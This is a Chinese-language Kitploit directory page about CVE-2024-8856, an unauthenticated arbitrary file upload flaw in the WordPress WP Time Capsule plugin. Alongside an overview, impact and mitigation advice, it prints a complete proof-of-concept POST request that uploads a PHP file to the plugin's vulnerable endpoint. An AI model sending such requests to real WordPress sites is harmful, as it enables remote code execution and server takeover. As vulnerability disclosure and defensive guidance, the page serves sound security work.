Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/ubaydev/cve-2024-8856
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试Payload 开发
GitHububaydev/cve-2024-8856

CVE-2024-8856

WordPress WP Time Capsule 插件任意文件上传漏洞

查看仓库
2131年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-8856:WordPress WP Time Capsule 插件任意文件上传漏洞

概述

CVE-2024-8856 是 WP Time Capsule WordPress 插件中存在的一个安全漏洞,允许未认证用户在服务器上上传任意文件。如果上传的文件被服务器执行,这可能导致远程代码执行。该漏洞源于不充分的文件验证,攻击者可通过向易受攻击的端点发送特制请求来利用此漏洞。

受影响版本

  • 1.22.21 之前的 WP Time Capsule 插件版本(已在 1.22.22 中修复)。

影响

该漏洞允许未认证用户:

  • 在服务器上上传恶意 PHP 脚本。
  • 在服务器上执行任意代码,导致系统完全受损。
  • 可能利用此访问权限进一步利用 Web 应用程序及底层基础设施。

概念验证 (PoC)

以下是通过向易受攻击的端点发送 POST 请求来利用 CVE-2024-8856 漏洞的概念验证。

示例请求

root@kitploit:~
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close

------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql

<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--

PoC 说明

  • POST 请求:请求为 POST 方式,指向暴露易受攻击上传功能的路径。
  • Content-Type:请求设置 Content-Type 为 multipart/form-data,这是文件上传所必需的。
  • 文件上传:文件在请求体中通过 Content-Disposition 头部指定。示例中尝试上传一个包含 <?php phpinfo(); 的 PHP 文件,该文件如果被执行将显示 PHP 配置详情。
  • 易受攻击的端点:端点 /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php 是攻击利用点。

缓解措施

为缓解该漏洞:

  • 更新插件:确保 WP Time Capsule 插件始终更新至开发者提供的最新版本。
  • 文件上传限制:在服务器上实施文件上传限制,仅允许特定文件类型(例如图片),并禁止执行上传的文件。
  • Web 应用防火墙 (WAF):使用 Web 应用防火墙 (WAF) 检测并阻止恶意请求到达服务器。

参考

CVE-2024-8856 - 国家漏洞数据库

结论

CVE-2024-8856 是一个严重漏洞,使用 WP Time Capsule 插件的 WordPress 站点管理员需要立即关注。应采取适当预防措施保护应用程序免受潜在利用。始终保持安全实践和插件更新。

下载工具